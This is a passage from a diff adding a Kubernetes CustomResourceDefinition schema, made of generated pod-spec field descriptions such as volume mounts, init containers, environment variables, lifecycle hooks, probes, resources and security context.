mountPath: + description: Path within the container at + which the volume should be mounted. Must + not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how + mounts are propagated from the host to container + and the other way around. When not set, + MountPropagationNone is used. This field + is beta in 1.10. + type: string + name: + description: This must match the Name of a + Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write + otherwise (false or unspecified). Defaults + to false. + type: boolean + subPath: + description: Path within the volume from which + the container's volume should be mounted. + Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume + from which the container's volume should + be mounted. Behaves similarly to SubPath + but environment variable references $(VAR_NAME) + are expanded using the container's environment. + Defaults to "" (volume's root). SubPathExpr + and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not + specified, the container runtime's default will + be used, which might be configured in the container + image. Cannot be updated. + type: string + required: + - name + type: object + type: array + hostAliases: + description: HostAliases is an optional list of hosts + and IPs that will be injected into the pod's hosts file + if specified. This is only valid for non-hostNetwork + pods. 
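+                  # Illustrative sketch (comment only, not part of the generated
+                  # schema): a hostAliases entry as described above; the IP and
+                  # hostnames are examples.
+                  #   hostAliases:
+                  #   - ip: "10.0.0.10"
+                  #     hostnames:
+                  #     - "db.local"
+                  #     - "cache.local"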
+ items: + description: HostAlias holds the mapping between IP + and hostnames that will be injected as an entry in + the pod's hosts file. + properties: + hostnames: + description: Hostnames for the above IP address. + items: + type: string + type: array + ip: + description: IP address of the host file entry. + type: string + type: object + type: array + hostIPC: + description: 'Use the host''s ipc namespace. Optional: + Defaults to false.' + type: boolean + hostNetwork: + description: Host networking requested for this pod. Use + the host's network namespace. If this option is set, + the ports that will be used must be specified. Defaults + to false. + type: boolean + hostPID: + description: 'Use the host''s pid namespace. Optional: + Defaults to false.' + type: boolean + hostname: + description: Specifies the hostname of the Pod. If not + specified, the pod's hostname will be set to a system-defined + value. + type: string + imagePullSecrets: + description: 'ImagePullSecrets is an optional list of + references to secrets in the same namespace to use for + pulling any of the images used by this PodSpec. If specified, + these secrets will be passed to individual puller implementations + for them to use. For example, in the case of docker, + only DockerConfig type secrets are honored. More info: + https://kubernetes.io/docs/concepts/containers/images#specifying-imagepullsecrets-on-a-pod' + items: + description: LocalObjectReference contains enough information + to let you locate the referenced object inside the + same namespace. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, kind, + uid?' + type: string + type: object + type: array + initContainers: + description: 'List of initialization containers belonging + to the pod. Init containers are executed in order prior + to containers being started. If any init container fails, + the pod is considered to have failed and is handled + according to its restartPolicy. The name for an init + container or normal container must be unique among all + containers. Init containers may not have Lifecycle actions, + Readiness probes, Liveness probes, or Startup probes. + The resourceRequirements of an init container are taken + into account during scheduling by finding the highest + request/limit for each resource type, and then using + the max of that value or the sum of the normal containers. + Limits are applied to init containers in a similar fashion. + Init containers cannot currently be added or removed. + Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/' + items: + description: A single application container that you + want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker + image''s CMD is used if this is not provided. + Variable references $(VAR_NAME) are expanded using + the container''s environment. If a variable cannot + be resolved, the reference in the input string + will be unchanged. Double $$ are reduced to a + single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string + literal "$(VAR_NAME)". Escaped references will + never be expanded, regardless of whether the variable + exists or not. Cannot be updated.
More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within + a shell. The docker image''s ENTRYPOINT is used + if this is not provided. Variable references $(VAR_NAME) + are expanded using the container''s environment. + If a variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows for + escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" + will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless + of whether the variable exists or not. Cannot + be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set + in the container. Cannot be updated. + items: + description: EnvVar represents an environment + variable present in a Container. + properties: + name: + description: Name of the environment variable. + Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) + are expanded using the previously defined + environment variables in the container and + any service environment variables. If a + variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows + for escaping the $(VAR_NAME) syntax: i.e. + "$$(VAR_NAME)" will produce the string literal + "$(VAR_NAME)". Escaped references will never + be expanded, regardless of whether the variable + exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's + value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: + supports metadata.name, metadata.namespace, + `metadata.labels['''']`, `metadata.annotations['''']`, + spec.nodeName, spec.serviceAccountName, + status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + limits.ephemeral-storage, requests.cpu, + requests.memory and requests.ephemeral-storage) + are currently supported.' 
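+                                    # Illustrative sketch (comment only, not part of the
+                                    # generated schema): exposing the container's CPU limit
+                                    # as an env var via resourceFieldRef; divisor "1m"
+                                    # reports the value in millicores.
+                                    #   env:
+                                    #   - name: CPU_LIMIT_MILLICORES
+                                    #     valueFrom:
+                                    #       resourceFieldRef:
+                                    #         resource: limits.cpu
+                                    #         divisor: 1m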
+ properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret + in the pod's namespace + properties: + key: + description: The key of the secret + to select from. Must be a valid + secret key. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment + variables in the container. The keys defined within + a source must be a C_IDENTIFIER. All invalid keys + will be reported as an event when the container + is starting. When a key exists in multiple sources, + the value associated with the last source will + take precedence. Values defined by an Env with + a duplicate key will take precedence. Cannot be + updated. + items: + description: EnvFromSource represents the source + of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend + to each key in the ConfigMap. Must be a + C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images + This field is optional to allow higher level config + management to default or override container images + in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, + Never, IfNotPresent. Defaults to Always if :latest + tag is specified, or IfNotPresent otherwise. Cannot + be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system + should take in response to container lifecycle + events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately + after a container is created. 
If the handler + fails, the container is terminated and restarted + according to its restart policy. Other management + of the container blocks until the hook completes. + More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately + before a container is terminated due to an + API request or management event such as liveness/startup + probe failure, preemption, resource contention, + etc. The handler is not called if the container + crashes or exits. The reason for termination + is passed to the handler. The Pod''s termination + grace period countdown begins before the PreStop + hook is executed. Regardless of the outcome + of the handler, the container will eventually + terminate within the Pod''s termination grace + period. Other management of the container + blocks until the hook completes or until the + termination grace period is reached. More + info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take.
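+                              # Illustrative sketch (comment only, not part of the
+                              # generated schema): a preStop exec handler as it would
+                              # appear on a regular container (per the initContainers
+                              # description above, init containers may not have
+                              # lifecycle actions).
+                              #   lifecycle:
+                              #     preStop:
+                              #       exec:
+                              #         command: ["/bin/sh", "-c", "nginx -s quit"]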
+ properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. + Container will be restarted if the probe fails. + Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. 
HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Defaults to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be a non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as + a DNS_LABEL. Each container in a pod must have + a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. + Exposing a port here gives the system additional + information about the network connections a container + uses, but is primarily informational.
Not specifying + a port here DOES NOT prevent that port from being + exposed. Any port which is listening on the default + "0.0.0.0" address inside a container will be accessible + from the network. Cannot be updated. + items: + description: ContainerPort represents a network + port in a single container. + properties: + containerPort: + description: Number of port to expose on the + pod's IP address. This must be a valid port + number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external + port to. + type: string + hostPort: + description: Number of port to expose on the + host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork + is specified, this must match ContainerPort. + Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an + IANA_SVC_NAME and unique within the pod. + Each named port in a pod must have a unique + name. Name for the port that can be referred + to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, + TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service + readiness. Container will be removed from service + endpoints if the probe fails. Cannot be updated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. 
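+                            # Illustrative sketch (comment only, not part of the
+                            # generated schema): an httpGet probe using the fields
+                            # above, as it would appear on a regular container
+                            # (init containers may not have readiness probes).
+                            #   readinessProbe:
+                            #     httpGet:
+                            #       path: /healthz
+                            #       port: 8080
+                            #       scheme: HTTP
+                            #     initialDelaySeconds: 5
+                            #     periodSeconds: 10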
+ type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this + container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount + of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum + amount of compute resources required. If Requests + is omitted for a container, it defaults to + Limits if that is explicitly specified, otherwise + to an implementation-defined value. 
More info: + https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'SecurityContext defines the security + options the container should be run with. If set, + the fields of SecurityContext override the equivalent + fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls + whether a process can gain more privileges + than its parent process. This bool directly + controls if the no_new_privs flag will be + set on the container process. AllowPrivilegeEscalation + is true always when the container is: 1) run + as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when + running containers. Defaults to the default + set of capabilities granted by the container + runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. + Processes in privileged containers are essentially + equivalent to root on the host. Defaults to + false. + type: boolean + procMount: + description: procMount denotes the type of proc + mount to use for the containers. The default + is DefaultProcMount which uses the container + runtime defaults for readonly paths and masked + paths. This requires the ProcMountType feature + flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only + root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of + the container process. Uses runtime default + if unset. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must + run as a non-root user. If true, the Kubelet + will validate the image at runtime to ensure + that it does not run as UID 0 (root) and fail + to start the container if it does. If unset + or false, no such validation will be performed. + May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of + the container process. Defaults to user specified + in image metadata if unspecified. May also + be set in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, the + value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied + to the container. If unspecified, the container + runtime will allocate a random SELinux context + for each container. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + level: + description: Level is SELinux level label + that applies to the container. 
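As a hedged sketch, a locked-down container-level securityContext built from the fields described above might look like the following (the UID is an arbitrary example; values set here override the pod-level PodSecurityContext):

securityContext:
  allowPrivilegeEscalation: false   # keeps no_new_privs set on the container process
  privileged: false                 # do not run root-equivalent to the host
  readOnlyRootFilesystem: true
  runAsNonRoot: true                # kubelet refuses to start the container as UID 0
  runAsUser: 1000                   # example UID
  capabilities:
    drop:
    - ALL                           # drop the runtime's default capability set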
+ type: string + role: + description: Role is a SELinux role label + that applies to the container. + type: string + type: + description: Type is a SELinux type label + that applies to the container. + type: string + user: + description: User is a SELinux user label + that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this + container. If seccomp options are provided + at both the pod & container level, the container + options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates + a profile defined in a file on the node + should be used. The profile must be preconfigured + on the node to work. Must be a descending + path, relative to the kubelet's configured + seccomp profile location. Must only be + set if type is "Localhost". + type: string + type: + description: "type indicates which kind + of seccomp profile will be applied. Valid + options are: \n Localhost - a profile + defined in a file on the node should be + used. RuntimeDefault - the container runtime + default profile should be used. Unconfined + - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied + to all containers. If unspecified, the options + from the PodSecurityContext will be used. + If set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where + the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) + inlines the contents of the GMSA credential + spec named by the GMSACredentialSpecName + field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the + name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a + container should be run as a 'Host Process' + container. This field is alpha-level and + will only be honored by components that + enable the WindowsHostProcessContainers + feature flag. Setting this field without + the feature flag will result in errors + when validating the Pod. All of a Pod's + containers must have the same effective + HostProcess value (it is not allowed to + have a mix of HostProcess containers and + non-HostProcess containers). In addition, + if HostProcess is true then HostNetwork + must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to + run the entrypoint of the container process. + Defaults to the user specified in image + metadata if unspecified. May also be set + in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, + the value specified in SecurityContext + takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod + has successfully initialized. If specified, no + other probes are executed until this completes + successfully. If this probe fails, the Pod will + be restarted, just as if the livenessProbe failed. + This can be used to provide different probe parameters + at the beginning of a Pod''s lifecycle, when it + might take a long time to load data or warm a + cache, than during steady-state operation. This + cannot be updated. 
More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. 
Set this value longer
+                        than the expected cleanup time for your process.
+                        If this value is nil, the pod's terminationGracePeriodSeconds
+                        will be used. Otherwise, this value overrides
+                        the value provided by the pod spec. Value
+                        must be non-negative integer. The value zero
+                        indicates stop immediately via the kill signal
+                        (no opportunity to shut down). This is a beta
+                        field and requires enabling ProbeTerminationGracePeriod
+                        feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds
+                        is used if unset.
+                      format: int64
+                      type: integer
+                    timeoutSeconds:
+                      description: 'Number of seconds after which
+                        the probe times out. Defaults to 1 second.
+                        Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes'
+                      format: int32
+                      type: integer
+                  type: object
+                stdin:
+                  description: Whether this container should allocate
+                    a buffer for stdin in the container runtime. If
+                    this is not set, reads from stdin in the container
+                    will always result in EOF. Default is false.
+                  type: boolean
+                stdinOnce:
+                  description: Whether the container runtime should
+                    close the stdin channel after it has been opened
+                    by a single attach. When stdin is true the stdin
+                    stream will remain open across multiple attach
+                    sessions. If stdinOnce is set to true, stdin is
+                    opened on container start, is empty until the
+                    first client attaches to stdin, and then remains
+                    open and accepts data until the client disconnects,
+                    at which time stdin is closed and remains closed
+                    until the container is restarted. If this flag
+                    is false, a container process that reads from
+                    stdin will never receive an EOF. Default is false.
+                  type: boolean
+                terminationMessagePath:
+                  description: 'Optional: Path at which the file to
+                    which the container''s termination message will
+                    be written is mounted into the container''s filesystem.
+                    Message written is intended to be brief final
+                    status, such as an assertion failure message.
